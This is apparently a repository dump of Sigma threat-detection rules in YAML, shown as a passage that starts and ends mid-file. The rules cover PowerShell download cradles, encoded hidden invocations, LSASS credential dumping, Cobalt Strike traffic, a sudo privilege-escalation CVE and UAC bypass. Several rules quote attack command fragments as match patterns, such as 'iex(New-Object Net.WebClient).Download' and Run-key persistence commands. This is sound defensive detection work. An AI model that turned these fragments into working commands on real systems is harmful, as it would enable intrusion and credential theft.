21 | condition: selection
22 | falsepositives:
23 | - Admin activity
24 | - Crazy web applications
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_sudo_cve_2019_14287.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Sudo Privilege Escalation CVE-2019-14287
3 | id: f74107df-b6c6-4e80-bf00-4170b658162b
4 | status: experimental
5 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
6 | references:
7 | - https://www.openwall.com/lists/oss-security/2019/10/14/1
8 | - https://access.redhat.com/security/cve/cve-2019-14287
9 | - https://twitter.com/matthieugarin/status/1183970598210412546
10 | author: Florian Roth
11 | date: 2019/10/15
12 | modified: 2019/10/20
13 | tags:
14 | - attack.privilege_escalation
15 | - attack.t1068
16 | - attack.t1169
17 | logsource:
18 | product: linux
19 | falsepositives:
20 | - Unlikely
21 | level: critical
22 | ---
23 | detection:
24 | selection_keywords:
25 | - '* -u#*'
26 | condition: selection_keywords
27 | ---
28 | detection:
29 | selection_user:
30 | USER:
31 | - '#-*'
32 | - '#*4294967295'
33 | condition: selection_user
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/net_dns_c2_detection.yml:
--------------------------------------------------------------------------------
1 | title: Possible DNS Tunneling
2 | id: 1ec4b281-aa65-46a2-bdae-5fd830ed914e
3 | status: experimental
4 | description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain,
5 | which can be an indicator that DNS is used to transfer data.
6 | references:
7 | - https://zeltser.com/c2-dns-tunneling/
8 | - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/
9 | author: Patrick Bareiss
10 | date: 2019/04/07
11 | logsource:
12 | product: dns
13 | detection:
14 | selection:
15 | parent_domain: '*'
16 | condition: selection | count(dns_query) by parent_domain > 1000
17 | falsepositives:
18 | - Valid software, which uses dns for transferring data
19 | level: high
20 | tags:
21 | - attack.t1043
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/net_susp_dns_txt_exec_strings.yml:
--------------------------------------------------------------------------------
1 | title: DNS TXT Answer with possible execution strings
2 | id: 8ae51330-899c-4641-8125-e39f2e07da72
3 | status: experimental
4 | description: Detects strings used in command execution in DNS TXT Answer
5 | references:
6 | - https://twitter.com/stvemillertime/status/1024707932447854592
7 | - https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1
8 | tags:
9 | - attack.t1071
10 | author: Markus Neis
11 | date: 2018/08/08
12 | logsource:
13 | category: dns
14 | detection:
15 | selection:
16 | record_type: 'TXT'
17 | answer:
18 | - '*IEX*'
19 | - '*Invoke-Expression*'
20 | - '*cmd.exe*'
21 | condition: selection
22 | falsepositives:
23 | - Unknown
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_data_compressed.yml:
--------------------------------------------------------------------------------
1 | title: Data Compressed
2 | id: 6dc5d284-69ea-42cf-9311-fb1c3932a69a
3 | status: experimental
4 | description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount
5 | of data sent over the network
6 | author: Timur Zinniatullin, oscd.community
7 | date: 2019/10/21
8 | modified: 2019/11/04
9 | references:
10 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml
11 | logsource:
12 | product: windows
13 | service: powershell
14 | description: 'Script block logging must be enabled'
15 | detection:
16 | selection:
17 | EventID: 4104
18 | keywords|contains|all:
19 | - '-Recurse'
20 | - '|'
21 | - 'Compress-Archive'
22 | condition: selection
23 | falsepositives:
24 | - highly likely if archive ops are done via PS
25 | level: low
26 | tags:
27 | - attack.exfiltration
28 | - attack.t1002
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_downgrade_attack.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Downgrade Attack
2 | id: 6331d09b-4785-4c13-980f-f96661356249
3 | status: experimental
4 | description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
5 | references:
6 | - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1086
11 | author: Florian Roth (rule), Lee Holmes (idea)
12 | logsource:
13 | product: windows
14 | service: powershell-classic
15 | detection:
16 | selection:
17 | EventID: 400
18 | EngineVersion: '2.*'
19 | filter:
20 | HostVersion: '2.*'
21 | condition: selection and not filter
22 | falsepositives:
23 | - Penetration Test
24 | - Unknown
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_exe_calling_ps.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell called from an Executable Version Mismatch
2 | id: c70e019b-1479-4b65-b0cc-cd0c6093a599
3 | status: experimental
4 | description: Detects PowerShell called from an executable by the version mismatch method
5 | references:
6 | - https://adsecurity.org/?p=2921
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1086
11 | author: Sean Metcalf (source), Florian Roth (rule)
12 | logsource:
13 | product: windows
14 | service: powershell-classic
15 | detection:
16 | selection1:
17 | EventID: 400
18 | EngineVersion:
19 | - '2.*'
20 | - '4.*'
21 | - '5.*'
22 | HostVersion: '3.*'
23 | condition: selection1
24 | falsepositives:
25 | - Penetration Tests
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_ntfs_ads_access.yml:
--------------------------------------------------------------------------------
1 | title: NTFS Alternate Data Stream
2 | id: 8c521530-5169-495d-a199-0a3a881ad24e
3 | status: experimental
4 | description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
5 | references:
6 | - http://www.powertheshell.com/ntfsstreams/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1096
10 | author: Sami Ruohonen
11 | logsource:
12 | product: windows
13 | service: powershell
14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
15 | detection:
16 | keyword1:
17 | - "set-content"
18 | keyword2:
19 | - "-stream"
20 | condition: keyword1 and keyword2
21 | falsepositives:
22 | - unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_prompt_credentials.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Credential Prompt
2 | id: ca8b77a9-d499-4095-b793-5d5f330d450e
3 | status: experimental
4 | description: Detects PowerShell calling a credential prompt
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/850381440629981184
7 | - https://t.co/ezOTGy1a1G
8 | tags:
9 | - attack.execution
10 | - attack.credential_access
11 | - attack.t1086
12 | author: John Lambert (idea), Florian Roth (rule)
13 | logsource:
14 | product: windows
15 | service: powershell
16 | definition: 'Script block logging must be enabled'
17 | detection:
18 | selection:
19 | EventID: 4104
20 | keyword:
21 | Message:
22 | - '*PromptForCredential*'
23 | condition: all of them
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_psattack.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell PSAttack
2 | id: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5
3 | status: experimental
4 | description: Detects the use of PSAttack PowerShell hack tool
5 | references:
6 | - https://adsecurity.org/?p=2921
7 | tags:
8 | - attack.execution
9 | - attack.t1086
10 | author: Sean Metcalf (source), Florian Roth (rule)
11 | logsource:
12 | product: windows
13 | service: powershell
14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
15 | detection:
16 | selection:
17 | EventID: 4103
18 | keyword:
19 | - 'PS ATTACK!!!'
20 | condition: all of them
21 | falsepositives:
22 | - Pentesters
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_shellcode_b64.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell ShellCode
2 | id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
3 | status: experimental
4 | description: Detects Base64 encoded Shellcode
5 | references:
6 | - https://twitter.com/cyb3rops/status/1063072865992523776
7 | tags:
8 | - attack.privilege_escalation
9 | - attack.execution
10 | - attack.t1055
11 | - attack.t1086
12 | author: David Ledbetter (shellcode), Florian Roth (rule)
13 | date: 2018/11/17
14 | logsource:
15 | product: windows
16 | service: powershell
17 | description: 'Script block logging must be enabled'
18 | detection:
19 | selection:
20 | EventID: 4104
21 | keyword1:
22 | - '*AAAAYInlM*'
23 | keyword2:
24 | - '*OiCAAAAYInlM*'
25 | - '*OiJAAAAYInlM*'
26 | condition: selection and keyword1 and keyword2
27 | falsepositives:
28 | - Unknown
29 | level: critical
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_download.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Download
2 | id: 65531a81-a694-4e31-ae04-f8ba5bc33759
3 | status: experimental
4 | description: Detects suspicious PowerShell download command
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | keywords:
14 | Message:
15 | - '*System.Net.WebClient).DownloadString(*'
16 | - '*system.net.webclient).downloadfile(*'
17 | condition: keywords
18 | falsepositives:
19 | - PowerShell scripts that download content from the Internet
20 | level: medium
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_invocation_generic.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Invocations - Generic
2 | id: 3d304fda-78aa-43ed-975c-d740798a49c1
3 | status: experimental
4 | description: Detects suspicious PowerShell invocation command parameters
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth (rule)
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | encoded:
14 | - ' -enc '
15 | - ' -EncodedCommand '
16 | hidden:
17 | - ' -w hidden '
18 | - ' -window hidden '
19 | - ' - windowstyle hidden '
20 | noninteractive:
21 | - ' -noni '
22 | - ' -noninteractive '
23 | condition: all of them
24 | falsepositives:
25 | - Penetration tests
26 | - Very special / sneaky PowerShell scripts
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_invocation_specific.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Invocations - Specific
2 | id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
3 | status: experimental
4 | description: Detects suspicious PowerShell invocation command parameters
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth (rule)
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | keywords:
14 | Message:
15 | - '* -nop -w hidden -c * [Convert]::FromBase64String*'
16 | - '* -w hidden -noni -nop -c "iex(New-Object*'
17 | - '* -w hidden -ep bypass -Enc*'
18 | - '*powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run*'
19 | - '*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*'
20 | - '*iex(New-Object Net.WebClient).Download*'
21 | condition: keywords
22 | falsepositives:
23 | - Penetration tests
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_keywords.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Keywords
2 | id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
3 | status: experimental
4 | description: Detects keywords that could indicate the use of some PowerShell exploitation framework
5 | date: 2019/02/11
6 | author: Florian Roth
7 | references:
8 | - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
9 | tags:
10 | - attack.execution
11 | - attack.t1086
12 | logsource:
13 | product: windows
14 | service: powershell
15 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
16 | detection:
17 | keywords:
18 | Message:
19 | - "*[System.Reflection.Assembly]::Load*"
20 | condition: keywords
21 | falsepositives:
22 | - Penetration tests
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_cobalt_ocsp.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Malleable (OCSP) Profile
2 | id: 37325383-740a-403d-b1a2-b2b4ab7992e7
3 | status: experimental
4 | description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
5 | references:
6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile
7 | author: Markus Neis
8 | tags:
9 | - attack.t1102
10 | logsource:
11 | category: proxy
12 | detection:
13 | selection:
14 | c-uri: '*/oscp/*'
15 | cs-host: 'ocsp.verisign.com'
16 |
17 | condition: selection
18 | falsepositives:
19 | - Unknown
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_cobalt_onedrive.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Malleable OneDrive browsing traffic profile
2 | id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
3 | status: experimental
4 | description: Detects Malleable OneDrive Profile
5 | references:
6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile
7 | author: Markus Neis
8 | tags:
9 | - attack.t1102
10 | logsource:
11 | category: proxy
12 | detection:
13 | selection:
14 | cs-method: 'GET'
15 | c-uri: '*?manifest=wac'
16 | cs-host: 'onedrive.live.com'
17 | filter:
18 | c-uri: 'http*://onedrive.live.com/*'
19 | condition: selection and not filter
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_raw_paste_service_access.yml:
--------------------------------------------------------------------------------
1 | title: Raw Paste Service Access
2 | id: 5468045b-4fcc-4d1a-973c-c9c9578edacb
3 | status: experimental
4 | description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
5 | references:
6 | - https://www.virustotal.com/gui/domain/paste.ee/relations
7 | author: Florian Roth
8 | date: 2019/12/05
9 | tags:
10 | - attack.t1102
11 | - attack.defense_evasion
12 | logsource:
13 | category: proxy
14 | detection:
15 | selection:
16 | c-uri|contains:
17 | - '.paste.ee/r/'
18 | - '.pastebin.com/raw/'
19 | - '.hastebin.com/raw/'
20 | condition: selection
21 | fields:
22 | - ClientIP
23 | - c-uri
24 | - c-useragent
25 | falsepositives:
26 | - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_ads_executable.yml:
--------------------------------------------------------------------------------
1 | title: Executable in ADS
2 | id: b69888d4-380c-45ce-9cf9-d9ce46e67821
3 | status: experimental
4 | description: Detects the creation of an ADS data stream that contains an executable (non-empty imphash)
5 | references:
6 | - https://twitter.com/0xrawsec/status/1002478725605273600?s=21
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1027
10 | - attack.s0139
11 | author: Florian Roth, @0xrawsec
12 | date: 2018/06/03
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | definition: 'Requirements: Sysmon config with Imphash logging activated'
17 | detection:
18 | selection:
19 | EventID: 15
20 | filter:
21 | Imphash: '00000000000000000000000000000000'
22 | condition: selection and not filter
23 | fields:
24 | - TargetFilename
25 | - Image
26 | falsepositives:
27 | - unknown
28 | level: critical
29 |
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_cactustorch.yml:
--------------------------------------------------------------------------------
1 | title: CACTUSTORCH Remote Thread Creation
2 | id: 2e4e488a-6164-4811-9ea1-f960c7359c40
3 | description: Detects remote thread creation from CACTUSTORCH as described in references.
4 | references:
5 | - https://twitter.com/SBousseaden/status/1090588499517079552
6 | - https://github.com/mdsecactivebreach/CACTUSTORCH
7 | status: experimental
8 | author: '@SBousseaden (detection), Thomas Patzke (rule)'
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | SourceImage:
16 | - '*\System32\cscript.exe'
17 | - '*\System32\wscript.exe'
18 | - '*\System32\mshta.exe'
19 | - '*\winword.exe'
20 | - '*\excel.exe'
21 | TargetImage: '*\SysWOW64\\*'
22 | StartModule: null
23 | condition: selection
24 | tags:
25 | - attack.execution
26 | - attack.t1055
27 | - attack.t1064
28 | falsepositives:
29 | - unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_cobaltstrike_process_injection.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Process Injection
2 | id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42
3 | description: Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
4 | references:
5 | - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
6 | - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1055
10 | status: experimental
11 | author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community
12 | date: 2018/11/30
13 | modified: 2019/11/08
14 | logsource:
15 | product: windows
16 | service: sysmon
17 | detection:
18 | selection:
19 | EventID: 8
20 | TargetProcessAddress|endswith:
21 | - '0B80'
22 | - '0C7C'
23 | - '0C88'
24 | condition: selection
25 | falsepositives:
26 | - unknown
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_ghostpack_safetykatz.yml:
--------------------------------------------------------------------------------
1 | title: Detection of SafetyKatz
2 | id: e074832a-eada-4fd7-94a1-10642b130e16
3 | status: experimental
4 | description: Detects possible SafetyKatz Behaviour
5 | references:
6 | - https://github.com/GhostPack/SafetyKatz
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | author: Markus Neis
11 | date: 2018/07/24
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 11
18 | TargetFilename: '*\Temp\debug.bin'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_lsass_memdump.yml:
--------------------------------------------------------------------------------
1 | title: LSASS Memory Dump
2 | id: 5ef9853e-4d0e-4a70-846f-a9ca37d876da
3 | status: experimental
4 | description: Detects process LSASS memory dump using procdump or taskmgr based on the CallTrace pointing to dbghelp.dll or dbgcore.dll for win10
5 | author: Samir Bousseaden
6 | references:
7 | - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html
8 | tags:
9 | - attack.t1003
10 | - attack.s0002
11 | - attack.credential_access
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 10
18 | TargetImage: 'C:\windows\system32\lsass.exe'
19 | GrantedAccess: '0x1fffff'
20 | CallTrace:
21 | - '*dbghelp.dll*'
22 | - '*dbgcore.dll*'
23 | condition: selection
24 | falsepositives:
25 | - unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_mimikatz_trough_winrm.yml:
--------------------------------------------------------------------------------
1 | title: Mimikatz through Windows Remote Management
2 | id: aa35a627-33fb-4d04-a165-d33b4afca3e8
3 | description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.
4 | references:
5 | - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
6 | status: stable
7 | author: Patryk Prauze - ING Tech
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 10
14 | TargetImage: 'C:\windows\system32\lsass.exe'
15 | SourceImage: 'C:\Windows\system32\wsmprovhost.exe'
16 | condition: selection
17 | tags:
18 | - attack.credential_access
19 | - attack.execution
20 | - attack.t1003
21 | - attack.t1028
22 | - attack.s0005
23 | falsepositives:
24 | - low
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_password_dumper_lsass.yml:
--------------------------------------------------------------------------------
1 | title: Password Dumper Remote Thread in LSASS
2 | id: f239b326-2f41-4d6b-9dfa-c846a60ef505
3 | description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process
4 | in field Process is the malicious program. A single execution can lead to hundreds of events.
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
7 | status: stable
8 | author: Thomas Patzke
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | TargetImage: 'C:\Windows\System32\lsass.exe'
16 | StartModule: null
17 | condition: selection
18 | tags:
19 | - attack.credential_access
20 | - attack.t1003
21 | - attack.s0005
22 | falsepositives:
23 | - unknown
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_quarkspw_filedump.yml:
--------------------------------------------------------------------------------
1 | title: QuarksPwDump Dump File
2 | id: 847def9e-924d-4e90-b7c4-5f581395a2b4
3 | status: experimental
4 | description: Detects a dump file written by QuarksPwDump password dumper
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
7 | author: Florian Roth
8 | date: 2018/02/10
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | level: critical
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | # Sysmon: File Creation (ID 11)
19 | EventID: 11
20 | TargetFilename: '*\AppData\Local\Temp\SAM-*.dmp*'
21 | condition: selection
22 | falsepositives:
23 | - Unknown
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_rdp_reverse_tunnel.yml:
--------------------------------------------------------------------------------
1 | title: RDP over Reverse SSH Tunnel
2 | id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4
3 | status: experimental
4 | description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
5 | references:
6 | - https://twitter.com/SBousseaden/status/1096148422984384514
7 | author: Samir Bousseaden
8 | date: 2019/02/16
9 | tags:
10 | - attack.defense_evasion
11 | - attack.command_and_control
12 | - attack.t1076
13 | - car.2013-07-002
14 | logsource:
15 | product: windows
16 | service: sysmon
17 | detection:
18 | selection:
19 | EventID: 3
20 | Image: '*\svchost.exe'
21 | Initiated: 'true'
22 | SourcePort: 3389
23 | DestinationIp:
24 | - '127.*'
25 | - '::1'
26 | condition: selection
27 | falsepositives:
28 | - unknown
29 | level: high
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_registry_persistence_key_linking.yml:
--------------------------------------------------------------------------------
1 | title: Windows Registry Persistence - COM key linking
2 | id: 9b0f8a61-91b2-464f-aceb-0527e0a45020
3 | status: experimental
4 | description: Detects COM object hijacking via TreatAs subkey
5 | references:
6 | - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
7 | author: Kutepov Anton, oscd.community
8 | date: 2019/10/23
9 | modified: 2019/11/07
10 | tags:
11 | - attack.persistence
12 | - attack.t1122
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 12
19 | TargetObject|startswith: 'HKU\'
20 | TargetObject|contains: '_Classes\CLSID\'
21 | TargetObject|endswith: '\TreatAs'
22 | condition: selection
23 | falsepositives:
24 | - Maybe some system utilities in rare cases use linking keys for backward compability
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_renamed_procdump.yml:
--------------------------------------------------------------------------------
1 | title: Renamed ProcDump
2 | id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67
3 | status: experimental
4 | description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
5 | references:
6 | - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
7 | author: Florian Roth
8 | date: 2019/11/18
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | OriginalFileName: 'procdump'
18 | filter:
19 | Image:
20 | - '*\procdump.exe'
21 | - '*\procdump64.exe'
22 | condition: selection and not filter
23 | falsepositives:
24 | - Procdump illegaly bundled with legitimate software
25 | - Weird admins who renamed binaries
26 | level: critical
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_download_run_key.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RUN Key from Download
2 | id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be
3 | status: experimental
4 | description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
5 | references:
6 | - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/
7 | author: Florian Roth
8 | date: 2019/10/01
9 | tags:
10 | - attack.persistence
11 | - attack.t1060
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 13
18 | Image:
19 | - '*\Downloads\\*'
20 | - '*\Temporary Internet Files\Content.Outlook\\*'
21 | - '*\Local Settings\Temporary Internet Files\\*'
22 | TargetObject: '*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\*'
23 | condition: selection
24 | falsepositives:
25 | - Software installers downloaded and used by users
26 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_driver_load.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Driver Load from Temp
2 | id: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75
3 | description: Detects a driver load from a temporary directory
4 | author: Florian Roth
5 | tags:
6 | - attack.persistence
7 | - attack.t1050
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 6
14 | ImageLoaded: '*\Temp\\*'
15 | condition: selection
16 | falsepositives:
17 | - there is a relevant set of false positives depending on applications in the environment
18 | level: medium
19 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_image_load.yml:
--------------------------------------------------------------------------------
1 | title: Possible Process Hollowing Image Loading
2 | id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7
3 | status: experimental
4 | description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz
5 | references:
6 | - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html
7 | author: Markus Neis
8 | date: 2018/01/07
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1073
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 7
18 | Image:
19 | - '*\notepad.exe'
20 | ImageLoaded:
21 | - '*\samlib.dll'
22 | - '*\WinSCard.dll'
23 | condition: selection
24 | falsepositives:
25 | - Very likely, needs more tuning
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_lsass_dll_load.yml:
--------------------------------------------------------------------------------
1 | title: DLL Load via LSASS
2 | id: b3503044-60ce-4bf4-bbcb-e3db98788823
3 | status: experimental
4 | description: Detects a method to load DLL via LSASS process using an undocumented Registry key
5 | author: Florian Roth
6 | date: 2019/10/16
7 | references:
8 | - https://blog.xpnsec.com/exploring-mimikatz-part-1/
9 | - https://twitter.com/SBousseaden/status/1183745981189427200
10 | logsource:
11 | product: windows
12 | service: sysmon
13 | detection:
14 | selection:
15 | EventID:
16 | - 12
17 | - 13
18 | TargetObject:
19 | - '*\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt*'
20 | - '*\CurrentControlSet\Services\NTDS\LsaDbExtPt*'
21 | condition: selection
22 | tags:
23 | - attack.execution
24 | - attack.t1177
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_powershell_rundll32.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Rundll32 Remote Thread Creation
2 | id: 99b97608-3e21-4bfe-8217-2a127c396a0e
3 | status: experimental
4 | description: Detects PowerShell remote thread creation in Rundll32.exe
5 | author: Florian Roth
6 | references:
7 | - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
8 | date: 2018/06/25
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | SourceImage: '*\powershell.exe'
16 | TargetImage: '*\rundll32.exe'
17 | condition: selection
18 | tags:
19 | - attack.defense_evasion
20 | - attack.execution
21 | - attack.t1085
22 | - attack.t1086
23 | falsepositives:
24 | - Unkown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_uac_bypass_sdclt.yml:
--------------------------------------------------------------------------------
1 | title: UAC Bypass via sdclt
2 | id: 5b872a46-3b90-45c1-8419-f675db8053aa
3 | status: experimental
4 | description: Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand
5 | references:
6 | - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
7 | author: Omer Yampel
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 13
14 | TargetObject: 'HKEY_USERS\\*\Classes\exefile\shell\runas\command\isolatedCommand'
15 | condition: selection
16 | tags:
17 | - attack.defense_evasion
18 | - attack.privilege_escalation
19 | - attack.t1088
20 | - car.2019-04-001
21 | falsepositives:
22 | - unknown
23 | level: high
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_win_binary_github_com.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Binary Github Communication
2 | id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153
3 | status: experimental
4 | description: Detects an executable in the Windows folder accessing github.com
5 | references:
6 | - https://twitter.com/M_haggis/status/900741347035889665
7 | - https://twitter.com/M_haggis/status/1032799638213066752
8 | author: Michael Haag (idea), Florian Roth (rule)
9 | tags:
10 | - attack.lateral_movement
11 | - attack.t1105
12 | logsource:
13 | product: windows
